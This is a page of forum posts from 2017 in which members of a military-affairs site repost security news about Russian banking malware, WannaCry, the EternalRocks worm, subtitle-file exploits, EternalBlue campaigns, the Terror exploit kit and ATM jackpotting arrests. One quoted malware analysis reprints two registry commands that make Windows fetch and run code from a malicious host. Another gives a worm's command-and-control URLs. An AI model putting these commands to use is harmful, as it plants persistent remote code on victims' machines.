SMALL WARS COUNCIL
Go Back   Small Wars Council > Small Wars Participants & Stakeholders > Media, Information & Cyber Warriors

Media, Information & Cyber Warriors Getting the story, dealing with those who do, and operating in the information & cyber domains. Not the news itself, that's here.

Reply
 
Thread Tools Display Modes
Old 5 Days Ago   #61
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 33,897
Default

http://www.reuters.com/article/us-ru..._medium=Social

Technology News | Mon May 22, 2017 | 5:00am EDT

Exclusive: Hackers hit Russian bank customers, planned international cyber raids


Quote:
Russian cyber criminals used malware planted on Android mobile devices to steal from domestic bank customers and were planning to target European lenders before their arrest, investigators and sources with knowledge of the case told Reuters.
Their campaign raised a relatively small sum by cyber-crime standards - more than 50 million roubles ($892,000) - but they had also obtained more sophisticated malicious software for a modest monthly fee to go after the clients of banks in France and possibly a range of other western nations.
Russia's relationship to cyber crime is under intense scrutiny after U.S. intelligence officials alleged that Russian hackers had tried to help Republican Donald Trump win the U.S. presidency by hacking Democratic Party servers.
The Kremlin has repeatedly denied the allegation.
The gang members tricked the Russian banks' customers into downloading malware via fake mobile banking applications, as well as via pornography and e-commerce programs, according to a report compiled by cyber security firm Group-IB which investigated the attack with the Russian Interior Ministry.
The criminals - 16 suspects were arrested by Russian law enforcement authorities in November last year - infected more than a million smartphones in Russia, on average compromising 3,500 devices a day, Group-IB said.
The hackers targeted customers of state lender Sberbank, and also stole money from accounts at Alfa Bank and online payments company Qiwi, exploiting weaknesses in the companies' SMS text message transfer services, said two people with direct knowledge of the case.
Although operating only in Russia before their arrest, they had developed plans to target large European banks including French lenders Credit Agricole, BNP Paribas and Societe General, Group-IB said.
A BNP Paribas spokeswoman said the bank could not confirm this information, but added that it "has a significant set of measures in place aimed at fighting cyber attacks on a daily basis". Societe General and Credit Agricole declined comment.
The gang, which was called "Cron" after the malware it used, did not steal any funds from customers of the three French banks. However, it exploited the bank service in Russia that allows users to transfer small sums to other accounts by sending an SMS message.
Having infected the users' phones, the gang sent SMS messages from those devices instructing the banks to transfer money to the hackers' own accounts.
The findings illustrate the dangers of using SMS messages for mobile banking, a method favored in emerging countries with less advanced internet infrastructure, said Lukas Stefanko, a malware researcher at cyber security firm ESET in Slovakia.
"It's becoming popular among developing nations or in the countryside where access to conventional banking is difficult for people," he said. "For them it is quick, easy and they don't need to visit a bank... But security always has to outweigh consumer convenience."

CYBER CRIMINALS
The Russian Interior Ministry said a number of people had been arrested, including what it described as the gang leader. This was a 30-year-old man living in Ivanovo, an industrial city 300 km (185 miles) northeast of Moscow, from where he had commanded a team of 20 people across six different regions.
Four people remain in detention while the others are under house arrest, the ministry said in a statement.
"In the course of 20 searches across six regions, police seized computers, hundreds of bank cards and SIM cards registered under fake names," it said.
Group-IB said the existence of the Cron malware was first detected in mid-2015, and by the time of the arrests the hackers had been using it for under a year.
The core members of the group were detained on Nov. 22 last year in Ivanovo. Photographs of the operation released by Group-IB showed one suspect face down in the snow as police in ski masks handcuffed him.
The "Cron" hackers were arrested before they could mount attacks outside Russia, but plans to do that were at an advanced stage, said the investigators.
Group-IB said that in June 2016 they had rented a piece of malware designed to attack mobile banking systems, called "Tiny.z" for $2,000 a month. The creators of the "Tiny.z" malware had adapted it to attack banks in Britain, Germany, France, the United States and Turkey, among other countries.
The "Cron" gang developed software designed to attack lenders including the three French groups, it said, adding it had notified these and other European banks at risk.
A spokeswoman for Sberbank said she had no information about the group involved. However, she said: "Several groups of cyber criminals are working against Sberbank. The number of groups and the methods they use to attack us change constantly."
"It isn't clear which specific group is being referred to here because the fraudulent scheme involving Android OS (operating system) viruses is widespread in Russia and Sberbank has effectively combated it for an extensive period of time."
Alfa Bank did not provide a comment. Qiwi did not respond to multiple requests for comment.
Also In Technology News
Softbank-Saudi tech fund becomes world's biggest with $93 billion of capital
Exclusive: North Korea's Unit 180, the cyber warfare cell that worries the West
Google, the maker of Android, has taken steps in recent years to protect users from downloading malicious code and by blocking apps which are insecure, impersonate legitimate companies or engage in deceptive behaviors.
The company declined to comment for this story, saying they had not seen the Group-IB report.

FAKE MOBILE APPS
The Russian authorities, bombarded with allegations of state-sponsored hacking, are keen to show Russia too is a frequent victim of cyber crime and that they are working hard to combat it. The interior and emergencies ministries, as well as Sberbank, said they were targeted in a global cyberattack earlier this month.
Since the allegations about the U.S. election hacking, further evidence has emerged of what some Western officials say is a symbiotic relationship between cyber criminals and Russian authorities, with hackers allowed to attack foreign targets with impunity in return for cooperating with the security services while Moscow clamps down on those operating at home.
The success of the Cron gang was facilitated by the popularity of SMS-banking services in Russia, said Dmitry Volkov, head of investigations at Group-IB.
The gang got their malware on to victims' devices by setting up applications designed to mimic banks' genuine apps. When users searched online, the results would suggest the fake app, which they would then download. The hackers also inserted malware into fake mobile apps for well-known pornography sites.
After infecting a customer's phone, the hackers were able to send a text message to the bank initiating a transfer of up to $120 to one of 6,000 bank accounts set up to receive the fraudulent payments.
The malware would then intercept a confirmation code sent by the bank and block the victim from receiving a message notifying them about the transaction.
"Cron's success was due to two main factors," Volkov said. "First, the large-scale use of partner programs to distribute the malware in different ways. Second, the automation of many (mobile) functions which allowed them to carry out the thefts without direct involvement."
OUTLAW 09 is offline   Reply With Quote
Old 5 Days Ago   #62
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 33,897
Default

Quote:
Originally Posted by OUTLAW 09 View Post
Patriarch of Russian Orthodox church making sure that the Ministry of Internal Affairs computers won't get affected by WannaCry virus attack
Russia suffered the highest number of registered WannaCry attacks globally and now suddenly they did not.....

Deputy secretary for Russia's National Security Council says WannaCry ransomware caused minimal damage in Russia.

That is not the story carried by their state media in the first days of the attack....

Over 100K computers got hit....as Russian runs largely illegal MS XP copies ......and illegal copies of MS Server 2003....
OUTLAW 09 is offline   Reply With Quote
Old 4 Days Ago   #63
flagg
Council Member
 
Join Date: Dec 2009
Posts: 71
Default

Quote:
Originally Posted by OUTLAW 09 View Post
Russia suffered the highest number of registered WannaCry attacks globally and now suddenly they did not.....

Deputy secretary for Russia's National Security Council says WannaCry ransomware caused minimal damage in Russia.

That is not the story carried by their state media in the first days of the attack....

Over 100K computers got hit....as Russian runs largely illegal MS XP copies ......and illegal copies of MS Server 2003....
Average Russian OS's are XP and MS Server 03?

That's crazy.

I think I also read that Russian banks only invest a fraction of that spent by major US/Western banks on IT/Cyber security.

Is the Russian banking sector seriously vulnerable to a non attributable proxy attack campaign?
flagg is offline   Reply With Quote
Old 4 Days Ago   #64
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 33,897
Default

Quote:
Originally Posted by flagg View Post
Average Russian OS's are XP and MS Server 03?

That's crazy.

I think I also read that Russian banks only invest a fraction of that spent by major US/Western banks on IT/Cyber security.

Is the Russian banking sector seriously vulnerable to a non attributable proxy attack campaign?
Answer to the question is...yes they are example..Morgan Stanley invested over 600M USDs in IT security in 2016 for their global network........

Entire Russian banking system 25M USDs.....

BTW...a lot of MS W7 was hit inside Russia......

Last edited by OUTLAW 09; 4 Days Ago at 03:41 PM.
OUTLAW 09 is offline   Reply With Quote
Old 4 Days Ago   #65
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 33,897
Default

A security expert discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw to spread itself like WannaCry ransomware.

Quote:
The security expert Miroslav Stampar, a member of the Croatian Government CERT, has discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw in the SMB protocol to spread itself like the popular WannaCry ransomware.
Stampar#discovered the EternalRocks after it infected his SMB honeypot, he called the malware ‘DoomsDayWorm.’

Stampar#discovered that the EternalRocks disguises itself as WannaCry, but instead of delivering a ransomware, it takes over the affected computer to power other attacks.

The researcher decompiled an older sample (start of May) of EternalRocks and published it on Github.

Unlike the WannaCry Ransomware that leverages the two NSA hacking tools EternalBlue and DoublePulsar, EternalRocks exploits seven exploits leaked by Shadow Brokers and its code doesn’t include a kill-switch.

EternalRockswas developed to avoid detection and to remain undetectable on the target system, it uses the following NSA exploits:

EternalBlue — SMBv1 exploit tool
EternalRomance — SMBv1 exploit tool
EternalChampion — SMBv2 exploit tool
EternalSynergy — SMBv3 exploit tool
SMBTouch — SMB reconnaissance tool
ArchTouch — SMB reconnaissance tool
DoublePulsar — Backdoor Trojan

EternalRocks downloads all the above SMB exploits to the infected computer, then it scans the internet for open SMB ports on other systems to compromise.

Giving a close look at the list we can find the SMB exploits EternalBlue, EternalChampion, EternalSynergy and EternalRomance.
The DoublePulsar is the exploit used by malware to implement network worm capabilities, while the SMBTouch and ArchTouch are SMB reconnaissance tools, designed to scan for systems hacking open SMB ports exposed on the Internet.

The EternalRocks works in two stages:
During the first stage, EternalRocks downloads the Tor web browser on the affected computers, then it uses the application to connect to the command-and-control (C&C) server located on the Tor network.
After 24 hours, the second stage starts,#the malware delays its action in the attempt to avoid sandboxing techniques.

“First stage malware UpdateInstaller.exe (got through remote exploitation with second stage malware) downloads necessary .NET components (for later stages)TaskScheduler and SharpZLib from Internet, while dropping svchost.exe (e.g. sample) and taskhost.exe (e.g. sample). Component svchost.exe is used for downloading, unpacking and running Tor from archive.torproject.org along with C&C (ubgdgno5eswkhmpy.onion) communication requesting further instructions (e.g. installation of new components).”#wrote the researcher.
“Second stage malware taskhost.exe (Note: different than one from first stage)#(e.g. sample) is being downloaded after a predefined period (24h) from http://ubgdgno5eswkhmpy.onion/updates/download?id=PC and run. After initial run it drops the exploit pack shadowbrokers.zip and unpacks contained directories payloads/, configs/ and bins/. After that, starts a random scan of opened 445 (SMB) ports on Internet, while running contained exploits (inside directory bins/) and pushing the first stage malware through payloads (inside directory payloads/). Also, it expects running Tor process from first stage to get further instructions from C&C.“

Callback to C&C for successful second stage installation is: ubgdgno5eswkhmpy[.]onion/updates/shadowsinstalled?version=1,55
Miroslav Stampar @stamparm
Just captured 406ac1595991ea7ca97bc908a6538131 and 5c9f450f2488140c21b6a0bd37db6a40 in MS17-010 honeypot. MSIL/.NET #WannaCry copycat(s)

Miroslav Stampar @stamparm
Info on (new) EternalRocks worm can be found on
https://github.com/stamparm/EternalRocks/#
…. Will keep it updated, along with @_jsoo_

Update on #EternalRocks. Original name is actually "MicroBotMassiveNet" while author's nick is "tmc" https://github.com/stamparm/EternalR...ebug-strings#…

If I will be asked to choose a name, let it be a DoomsDayWorm c52f20a854efb013a0a1248fd84aaa95

P.S. there is no kill-switch. Everything goes through Tor. Initial infection by MS17-010 drops Tor binaries for further communication

Somebody actually used complete Shadowbrokers dump (SMB part) and made a worm out of it. Uses WannaCry names (taskhost/svchost) to distract

Seems to be just spreading at the moment and getting further commands from C&C

Whole EternalRocks campaign (first and second stage malware) uses Mutex: {8F6F00C4-B901-45fd-08CF-72FDEFF}
Attached Images
File Type: jpg chart1.jpg (10.6 KB, 10 views)

Last edited by OUTLAW 09; 4 Days Ago at 03:37 PM.
OUTLAW 09 is offline   Reply With Quote
Old 4 Days Ago   #66
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 33,897
Default

URGENTLY IMPORTANT

It is just a matter of time until common malware through phishing bad guys will incorporate SMB exploits for synergistic attack.

Then, we all die.........
OUTLAW 09 is offline   Reply With Quote
Old 3 Days Ago   #67
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 33,897
Default

WARNING to US Military and SWJ commenters and readers.....

Kremlin troll @Noclador
was right @hardhouz13
Attached Images
Attached Images
File Type: jpg statement.jpg (90.1 KB, 8 views)
OUTLAW 09 is offline   Reply With Quote
Old 1 Day Ago   #68
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 33,897
Default

Recent on BRZbank hack. Bank hasn't owned up. Incl US accts. Never "exploited [on] such a big scale."Hacked 10/22/16 https://www.wired.com/2017/04/hacker...e-operation/#…
OUTLAW 09 is offline   Reply With Quote
Old 18 Hours Ago   #69
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 33,897
Default

Security experts from security firm Check Point warn of a subtitles hack threatens Millions of devices.

Quote:
According to the experts at Check Point, hackers could exploit a new attack vector that uses malicious subtitles to compromise devices via their media players.
Millions of users worldwide can be targeted due to security vulnerabilities in many popular streaming platforms, including VLC, Kodi (XBMC), Popcorn-Time, and stream.io.
“Check Point researchers revealed a new attack vector which threatens millions of users worldwide – attack by subtitles.” states the analysis shared by Check Point. “By crafting malicious subtitle files, which are then downloaded by a victim’s media player, attackers can take complete control over any type of device via vulnerabilities found in many popular streaming platforms, including VLC, Kodi (XBMC), Popcorn-Time and#strem.io.#We estimate there are approximately 200 million video players and streamers that currently run the vulnerable software, making this one of the most widespread, easily accessed and zero-resistance vulnerability reported in recent years.”
The patch for these vulnerabilities are available for download, users should apply them immediately.
According to the security firm, approximately 200 million video players and streamers are currently exposed to subtitle attack.
“We estimate there are approximately 200 million video players and streamers that currently run the vulnerable software, making this one of the most widespread, easily accessed and zero-resistance vulnerability reported in recent years,” continues the analysis. “Hacked in Translation.”
The attackers can craft malicious subtitle files that once executed by a user media player can allow attackers to take complete control over any type of device (i,e, laptops, smart TVs, tablets, and smartphones).
Unlike other attack vectors well known to security firms, this hacking technique is very subtle because subtitles are perceived harmless text files and are not subject to the inspection of security solutions.

In subtitles hack, the subtitle can be manipulated by attackers for several malicious purposes.
“This method requires little or no deliberate action on the part of the user, making it all the more dangerous,” states Check Point.
Check Point analyzed vulnerabilities in media players that allow a remote attacker to execute code and gain control full control of the targeted system.
The researchers were able to exploit a flaw in the popular VLC player to trigger a memory corruption issue and to gain control of a PC. Similar successful tests allowed the researchers to demonstrate subtitles hack on other players.
Check Point presented a proof of concept attack,#says victims are persuaded to visit a malicious website that uses one of the streaming video players, or they are tricked into running a malicious subtitle file on their system that they intentionally downloaded for use with a video.
“By conducting attacks through subtitles, hackers can take complete control over any device running them. From this point on, the attacker can do whatever he wants with the victim’s machine, whether it is a PC, a smart TV, or a mobile device. The potential damage the attacker can inflict is endless, ranging anywhere from stealing sensitive information, installing ransomware,#mass#Denial of Service attacks, and much more,” wrote Check Point.
Check Point plans to disclose the technical details of the tests only when software updates will be provided to the users.
Below the list of update currently available:
PopcornTime– Created a Fixed version, however it is not yet available to download in the official website.
The fixed version can be manually downloaded via the following link:
https://ci.popcorntime.sh/job/Popcorn-Time-Desktop/249
Kodi–Officialy fixed and available to download on their website. Link:
https://kodi.tv/download
VLC– Officially fixed and available to download on their website
Link:
http://get.videolan.org/vlc/2.2.5.1/....5.1-win32.exe
Stremio– Officially Fixed and available to download on their website
Link:
https://www.strem.io/
Attached Images
File Type: jpg hack.jpg (82.7 KB, 2 views)

Last edited by OUTLAW 09; 18 Hours Ago at 08:45 AM.
OUTLAW 09 is offline   Reply With Quote
Old 17 Hours Ago   #70
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 33,897
Default

At least 3 different groups have been leveraging the NSA EternalBlue exploit weeks before the WannaCry attacks, here’s the evidence.

Quote:
In the last days, security experts discovered numerous attacks that have been leveraging the same EternalBlue exploit used by the notorious WannaCry ransomware.
The Shadow Brokers hacker group revealed the exploit for the SMB vulnerability in April, but according to malware researchers, other threats used it such as the Adylkuzz botnet that is active since April 24.
Security experts at Cyphort found evidence on a honeypot server that threat actors in the wild were already exploiting the SMB flaw in early May to deliver a stealth Remote Access Trojan (RAT) instead of ransomware.
The RAT didn’t show worm network worm capabilities like the WannaCry ransomware.
The malware is delivered from an IP (182.18.23.38) located in China.
“Once the exploitation is successful, the attacker will send an encrypted payload as a shellcode. The shellcode is encrypted via XOR with the key, “A9 CA 63 BA”. The shellcode has an embedded binary in it as shown below:” reads the analysis published by Cyphort. “The embedded DLL is basically a trojan which downloads additional malware and receives commands from its controller.”
Once infected a system, the malicious code closes the port 445 to prevent other malware from abusing the same SMB flaw.
This aspect suggests the attacker was aware of the EternalBlue vulnerability.
“This is yet another indication that the malware is probably aware of the Eternal Blue vulnerability and is closing it.” continues the analysis. “The threat actors probably did not want other threats mingling with their activity. We believe that the group behind this attack is the same group that spreads Mirai via Windows Kaspersky discovered in February. #We found similarities in terms of their IOCs.”
The RAT sets the following Registry Run entries to download and execute additional malware.
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run” /v “start1” /d “msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q” /f
The malicious code attempts to delete a number of users and terminate and/or delete various files or processes. The experts also noticed that it is connected to a remote access tool hosted on a Chinese website, ForShare 8.28.
The malware can be instructed by the C&C server to execute various commands, including the screen monitoring, capturing audio and video, monitoring keystrokes, transfer data, deleting files, terminating processes, downloading and executing files and many other operations.
The report published by Cyphort included the Indicators of Compromise for this specific threat.
The facts that multiple groups have been exploiting ETERNALBLUE weeks before WannaCry is also demonstrated by an analysis published by Secdo.
Secdo claims to have found evidence of ransomware abusing EternalBlue flaw weeks before WannaCry emerged.
“Secdo has uncovered a new evasive attack that leaves no trace and has been infecting organizations using NSA exploits since the mid-April.” reads the analysis published by Secdo. “The ransomware is the most apparent payload, yet under the surface a more sophisticated attack occurred that would have gone unnoticed.”

The researchers also reported that threat actors in the wild were using an EternalBlue-based worm to infect all machines in a compromised network and exfiltrate login credentials.
Recently experts at Heimdal discovered the#UIWIX ransomware, a fileless malware exploiting the EternalBlue vulnerability.
Like the WannaCry, UIWIX exploits the same vulnerability in Windows SMB protocol, but the new threat has the ability to run in the memory of the infected system after the exploiting of the EternalBlue.
In late April, The experts at Secdo also discovered another attack exploiting the EthernalBlue vulnerability, it was associated with a Chinese threat actor that used a botnet to distribute a backdoor.
“It begins by spawning a thread inside of lsass.exe, similar to the credential theft attack, only instead of remaining purely in-memory, the initial payload connects back to a Chinese C2 server on port 998 (2.x.x.x) and downloads a known root-kit backdoor (based on Agony).” reads the analysis published by Secdo.
“The file is dropped in %programdata% under the name 666.exe. Existing NG-AV vendors that were present were able to block 666.exe from running, but remained oblivious to the malicious thread running inside of lsass.exe.”
Summarizing, at least 3 different groups have been leveraging the NSA exploit weeks before the WannaCry, this means a significant portion of the security community failed to monitor the threat or that failed to share the information about the attacks they have observed.
The success of EternalBlue attacks are the failure of our current model of cyber security.
Attached Images
File Type: jpg EternalBlue-SMB-flaw.jpg (10.5 KB, 2 views)

Last edited by OUTLAW 09; 17 Hours Ago at 08:53 AM.
OUTLAW 09 is offline   Reply With Quote
Old 17 Hours Ago   #71
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 33,897
Default

Experts from Talos Team discovered changes made to the Terror exploit kit (EK) that allow it to fingerprint victims and target specific vulnerabilities.

Quote:
Recent changes made to the Terror exploit kit (EK) allow it to fingerprint victims and target specific vulnerabilities instead of carpet bombing the victims with many exploits at the same time, Talos researchers discovered.
Last week I reported the news of the improvements of the Stegano Exploit kit, today we will speak about the Terror exploit kit that now includes fingerprinting capabilities.
The Terror Exploit Kit first appeared in the threat landscape in January 2017, in April experts observed a significant increase of hacking campaigns leveraging the EK.
Because of similarities with Sundown EK, experts at MalwareBytes initially thought that the Terror EK was simply a new variant of Sundown, but further investigation revealed that it was actually from a different actor (so-called Terror EK by Trustwave).
The Terror EK was advertised on various underground forums by a hacker with the online moniker @666_KingCobra that is offering it for sale under different names (i.e. Blaze, Neptune, and Eris).
Experts at Malwarebytes Labs said that the Terror EK was used in a malvertising campaign distributing the Smoke Loader by exploiting Internet Explorer, Flash, and Silverlight exploits.
The Terror EK was also involved in a campaign using a different landing page that distributes the Andromeda malware.
The compromised websites were used to redirect to the exploit kit landing page via server 302 redirect call and done via script injection.
The powerful exploit kit was observed carpet bombing victims using many exploits at the same time, but now experts from Talos group observed a#significant change in their tactic. News of the day is that the Terror Exploit Kit was improved with new exploits and implemented fingerprinting abilities. These latter features allow the EK to determine what exploit would be used in order to compromise the target system.
The new variant of the Terror Exploit Kit was able to determine the specific OS running on the victim’s PC, the browser version, installed security patches and plugins.
The researchers were served different files when accessing the site via different browsers, such as Internet Explorer 11 or Internet Explorer 8.
Talos malware researchers identified a potentially compromised legitimate website that operates as a malware gate. The website was initially used to redirect visitors to a RIG landing page, after a single day of analysis the gate switched to Terror exploit kit.
“Terror seems to constantly evolving. In this campaign it has added further exploits and no longer carpet bombs the victim. Instead it evaluates data regarding the victim’s environment and then picks potentially successful exploits depending on the victim’s operating system, patch level, browser version and installed plugins. This makes it harder for an investigator to fully uncover which exploits they have.” reads the analysis published by Talos.
“It is interesting to note that the adversaries are using an URL parameter in cleartext for the vulnerability they are going to exploit, e.g. cve2013-2551 = cve20132551 in the URL.”
The compromised website discovered by Talos experts redirects users to the EK landing page by using an HTTP 302 Moved Temporarily response, like previous campaigns.

The page uses obfuscated Javascript code to determine the victim’s browser environment, then uses the return value of this function to submit a hidden form called ‘frm’.
“As mentioned in the executive overview, it uses some obfuscated Javascript code to evaluate the victim’s browser environment, for example it tries to get version information about the following plugins: ActiveX, Flash, PDF reader, Java, Silverlight, QuickTime, etc. Then it uses the return value of this function to submit the hidden form called ‘frm’.” continues the analysis.
The EK also uses cookie-based authentication for downloading the exploits, which prevents third-parties from accessing them, the security researchers discovered. This approach prevents not only investigators from learning where from or how the victims were infected, but also stops competitors from stealing the exploits.
“We have seen that the exploit kit market is experiencing an ongoing change. Big players in this market disappear while new ones show up. The new players are fighting for customers by constantly improving their quality and techniques. They modify these techniques on an ongoing basis to improve their capability to bypass security tools. This clearly shows how important it is to make sure that all your systems are up to date,” concluded Talos.
Attached Images
File Type: jpg statement.jpg (40.0 KB, 2 views)
OUTLAW 09 is offline   Reply With Quote
Old 17 Hours Ago   #72
OUTLAW 09
Council Member
 
Join Date: Nov 2013
Posts: 33,897
Default

27 people have been arrested by the Europol for jackpotting attacks on ATM across many countries in Europe.

Quote:
Europol has arrested 27 people accused of being involved in a series of successful black box attacks against ATMs across Europe. Since 2016, these attacks have resulted in more than €45 million in losses.“The efforts of a number of EU Member States and Norway, supported by Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT), culminated in the arrest of 27 individuals linked with so-called ATM “Black Box” attacks across Europe.” states the Europol.“Perpetrators responsible for this new and sophisticated method of ATM jackpotting were identified in a number of countries over different periods of time in 2016 and 2017.# There were arrests in Czech Republic (3), Estonia (4), France (11), the Netherlands (2), Romania (2), Spain (2) and Norway (3).”First attacks were observed in 2015, but the technique#was widely adopted by crooks since 2016.

“In a European ATM Crime Report covering 2016 EAST has reported that ATM black box attacks were up 287% when compared to 2015.” states the European ATM Security Team (EAST).

“A total of 58 such attacks were reported by ten countries, up from 15 attacks during 2015. ‘Black Box’ is the connection of an unauthorised device which sends dispense commands directly to the ATM cash dispenser in order to ‘cash-out’ the ATM. Related losses were down 39%, from €0.74 million to €0.45 million.”
The technique is very effective, it has been estimated that crooks have stolen €45 million using it since 2016.

The attack method was first reported by the notorious expert Barnaby Jack in 2010, the researcher coined the term jackpotting during the 2010 Black Hat conference.

The brute-force black box attack against an ATM starts by punching a hole into the machine’s casing, then the crooks connect#a laptop to the exposed cables or ports and use it to issue commands to the ATM to dispense money.

The arrests were part of a still ongoing Europol#operation conducted with law enforcement of numerous states in Europe. Below the details of the arrests:
Netherlands (2 people)
Romania (2 people)
Spain (2 people)
Norway (3 people)
Czech Republic (3 people)
Estonia (4 people)
France (11 people)
“Our joint efforts to tackle this new criminal phenomenon resulted in significant arrests across Europe. However the arrest of offenders is only one part of stopping this form of criminality. Increasingly we need to work closely with the ATM industry to design out vulnerabilities at source and prevent the crime taking place,” said Steven Wilson, Head of Europol’s European Cybercrime Centre.
Criminals that were involved in the jackpotting ATM Black Box attacks are mainly from countries in Eastern Europe, such as Romania, Moldova, Russia, and Ukraine.
Video of this type of attack....
https://youtu.be/3HYA0MvizpM

Last edited by OUTLAW 09; 17 Hours Ago at 09:07 AM.
OUTLAW 09 is offline   Reply With Quote
Reply

Bookmarks

Tags
cyber, malware, threats

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Russo-Ukraine War 2016 (April-June) davidbfpo Europe 1088 07-01-2016 08:44 PM
Leadership of Cyber Warriors: Enduring Principles and New Directions SWJ Blog Media, Information & Cyber Warriors 0 07-11-2011 02:41 PM
USAF Cyber Command (catch all) selil Media, Information & Cyber Warriors 150 03-15-2011 09:50 PM
Beijing’s Doctrine on the Conduct of “Irregular Forms of Warfare” Jedburgh Asia-Pacific 51 01-08-2011 06:42 PM
Question 5: Cyber space (oh you know I had to ask at least one of these) selil TRADOC Senior Leaders Conference 7 08-14-2009 03:27 PM


All times are GMT. The time now is 02:48 AM.


Powered by vBulletin® Version 3.8.9. ©2000 - 2017, Jelsoft Enterprises Ltd.
Registered Users are solely responsible for their messages.
Operated by, and site design © 2005-2009, Small Wars Foundation